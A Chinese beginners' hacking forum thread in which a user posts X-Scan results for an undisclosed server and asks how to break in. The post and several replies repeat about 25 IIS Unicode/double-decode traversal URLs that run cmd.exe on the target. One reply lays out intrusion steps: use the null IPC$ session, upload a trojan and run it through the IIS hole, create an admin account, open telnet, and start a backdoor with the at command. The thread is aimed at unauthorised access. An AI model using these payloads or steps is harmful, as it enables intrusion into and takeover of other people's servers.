|
 | 作者: xzyt [xzyt]
 论坛用户 |
登录 |
| 正在检测"开放端口" ... 端口21开放: FTP (Control) 端口80开放: HTTP, World Wide Web 端口24开放: Private mail-system 端口135开放: Location Service 端口139开放: NETBIOS Session Service "开放端口"扫描完成, 发现 5. 正在检测"Snmp口令" ... "Snmp口令"扫描完成. 正在检测"SSL漏洞" ... "SSL漏洞"扫描完成. 正在检测"RPC漏洞" ... "RPC漏洞"扫描完成. 正在检测"SQL-Server弱口令" ... "SQL-Server弱口令"扫描完成. 正在检测"FTP弱口令" ... 发现 FTP弱口令: anonymous/[空口令] "FTP弱口令"扫描完成, 发现 1. 正在检测"NT-Server弱口令" ... "NT-Server弱口令"扫描完成. 正在检测"NetBios信息" ... 建立IPC$空会话成功 获取Netbios信息"服务器信息"完成 获取Netbios信息"网络共享资源列表"完成 获取Netbios信息"远程注册表信息"完成 IPC$会话已结束 发现 "NetBios信息". 正在检测"SMTP漏洞" ... "SMTP漏洞"扫描完成. 正在检测"POP3弱口令" ... "POP3弱口令"扫描完成. 正在检测"CGI漏洞" ... 正在检测"HTTP重定向错误页面" ... 正在检测"CGI漏洞" ... 发现 CGI漏洞: /iisadmin/ 发现 CGI漏洞: /scripts/tools/dsnform.exe 发现 CGI漏洞: /scripts/tools/getdrvrs.exe 发现 CGI漏洞: /scripts/tools/mkilog.exe 发现 CGI漏洞: /msadc/msadcs.dll 发现 CGI漏洞: /scripts/tools/newdsn.exe "CGI漏洞"扫描完成, 发现 6. 正在检测"IIS漏洞" ... 正在检测"HTTP重定向错误页面" ... 正在检测"IIS漏洞" ... 发现 IIS漏洞: /msadc/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\ 发现 IIS漏洞: /scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ 发现 IIS漏洞: /scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\ 发现 IIS漏洞: /scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ ]: "IIS漏洞"扫描完成, 发现 25. 扫描全部完成. |
| 地主 发表时间: 03/06 13:26 |
 | 回复: playopy [playopy] 论坛用户 |
登录 |
|
什么IP啊 端口21开放: FTP (Control) 端口80开放: HTTP, World Wide Web 端口24开放: Private mail-system 端口135开放: Location Service 端口139开放: NETBIOS Session Service 这么多漏洞啊 发现 CGI漏洞: /iisadmin/ 发现 CGI漏洞: /scripts/tools/dsnform.exe 发现 CGI漏洞: /scripts/tools/getdrvrs.exe 发现 CGI漏洞: /scripts/tools/mkilog.exe 发现 CGI漏洞: /msadc/msadcs.dll 发现 CGI漏洞: /scripts/tools/newdsn.exe "CGI漏洞"扫描完成, 发现 6. 正在检测"IIS漏洞" ... 正在检测"HTTP重定向错误页面" ... 正在检测"IIS漏洞" ... 发现 IIS漏洞: /msadc/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\ 发现 IIS漏洞: /scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ 发现 IIS漏洞: /scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\ 发现 IIS漏洞: /scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ 这些应该可以啊 |
| B1层 发表时间: 03/06 13:52 |
 | 回复: ypy [ypy]  见习版主 |
登录 |
|
最简单最有效的Unicode漏洞 |
| B2层 发表时间: 03/06 14:34 |
| 回复: ypy [ypy] 见习版主 |
登录 |
|
网上相关教程不要太多 |
| B3层 发表时间: 03/06 14:34 |
| 回复: xzyt [xzyt] 论坛用户 |
登录 |
|
不公开IP |
| B4层 发表时间: 03/06 17:53 |
| 回复: xzyt [xzyt] 论坛用户 |
登录 |
|
Unicode漏洞,怎么样使用 |
| B5层 发表时间: 03/06 17:54 |
 | 回复: foreverzc [foreverzc]  论坛用户 |
登录 |
|
并不好、只是提供一个权限很低的Shell,如果你能把木马传上去就完事,或者写个提升权限的程序,传上用shell运行 |
| B6层 发表时间: 03/06 19:53 |
| 回复: dengzitui [dengzitui] 论坛用户 |
登录 |
|
最好不是一个“密罐” |
| B7层 发表时间: 03/06 19:56 |
| 回复: xzyt [xzyt] 论坛用户 |
登录 |
|
什么? |
| B8层 发表时间: 03/07 16:21 |
 | 回复: studio [studio]  论坛用户 |
登录 |
|
给我ip 我就告诉你 |
| B9层 发表时间: 03/07 16:44 |
| 回复: dengzitui [dengzitui] 论坛用户 |
登录 |
|
如果对方在诱捕黑客你轻易上去……呵呵!会倒大霉的。同志们小心为妙呀 |
| B10层 发表时间: 03/07 17:09 |
 | 回复: baboo [baboo]  论坛用户 |
登录 |
|
建立IPC$空会话成功 呵呵,还有unicode,想怎么就怎么啊 |
| B11层 发表时间: 03/07 18:25 |
| 回复: hl82 [hl82] 论坛用户 |
登录 |
|
unicode 很少见了! |
| B12层 发表时间: 03/07 18:34 |
| 回复: hl82 [hl82] 论坛用户 |
登录 |
|
unicode 很少见了! |
| B13层 发表时间: 03/07 18:35 |
 | 回复: vishx [vishx] 论坛用户 |
登录 |
|
发现 IIS漏洞: /msadc/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /msadc/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 发现 IIS漏洞: /scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\ 发现 IIS漏洞: /scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ 发现 IIS漏洞: /scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\ 发现 IIS漏洞: /scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ 还有FTP弱口领 |
| B14层 发表时间: 03/08 10:53 |
| 回复: vishx [vishx] 论坛用户 |
登录 |
|
用unicode能改其组页 |
| B15层 发表时间: 03/08 10:54 |
 | 回复: lodobo [lodobo] 论坛用户 |
登录 |
|
你说的那个IP很有可能是诱捕黑客的。你真的要小心了。其实有很多可以利用的。。 1.即然他的139开着。而且空会话成功了。你的机器也是2000的话。那 你就用net命令联上。然后传一个木马上去。再用他的iis漏洞去运行那个木马。你就ok了。 2.做一个批处理文件。内容是建一个超级用户。然后也用iis去运行这个文件。成功后。用telnethack去打开一个端口。然后telnet上去就可以了。 或者得到权限后,联上给他传一个后门程序用at命令给他启动。用20cn的傻瓜扫描器或者流光的种植者都可以他启动。都可以的。 拙见一二,大家见笑。有错之处还请指出。谢谢 |
| B16层 发表时间: 03/08 16:33 |
| 回复: xzyt [xzyt] 论坛用户 |
登录 |
|
可是我的是win98的 |
| B17层 发表时间: 03/08 19:05 |
 | 回复: sol13 [sol13] 论坛用户 |
登录 |
|
兄弟,你是网管吗? 我是骗人的傻瓜,给我IP啊~~~~~~~~~~~~~~` |
| B18层 发表时间: 03/08 20:17 |
 | 回复: laievf [laievf] 论坛用户 |
登录 |
|
呵呵,我想………………Unicode可以做任何事,还可以开3389呵呵 |
| B19层 发表时间: 03/09 07:33 |
| 回复: neares [near] 论坛用户 |
登录 |
|
看不懂!! |
| B20层 发表时间: 03/09 10:41 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 这个应该怎么样下手,我是用X-Scan-v2.3-cn扫描的!